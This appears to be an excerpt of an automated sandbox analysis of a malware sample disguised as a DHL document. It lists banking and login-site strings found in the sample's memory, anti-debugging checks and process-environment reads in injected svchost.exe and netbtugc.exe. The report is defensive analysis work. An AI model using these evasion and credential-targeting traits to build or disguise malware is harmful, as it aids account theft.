Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /profileVMware20,11696494690u
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ivebrokers.co.inVMware20,11696494690~
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rtal.azure.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,1169649
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: firefox.exe, 00000008.00000002.1902862389.000001C6EC82C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^%
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ve Brokers - EU East & CentralVMware20,11696494690
Source: EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3912492914.000000000153F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03B7096E rdtsc

2_2_03B7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0021EAA2 BlockInput,

0_2_0021EAA2

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001D2622

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001A42DE

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C4CE8 mov eax, dword ptr fs:[00000030h]	0_2_001C4CE8
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_013883E0 mov eax, dword ptr fs:[00000030h]	0_2_013883E0
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_01388440 mov eax, dword ptr fs:[00000030h]	0_2_01388440
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_01386DC0 mov eax, dword ptr fs:[00000030h]	0_2_01386DC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]	2_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]	2_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]	2_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03BB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]	2_2_03C0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]	2_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]	2_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]	2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03BD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]	2_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]	2_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]	2_2_03C062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]	2_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]	2_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]	2_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]	2_2_03C0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]	2_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]	2_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]	2_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]	2_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]	2_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]	2_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]	2_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]	2_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]	2_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]	2_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]	2_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]	2_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]	2_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]	2_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]	2_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]	2_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]	2_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]	2_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]	2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]	2_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]	2_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]	2_2_03B280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03BC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]	2_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]	2_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03BB60E0
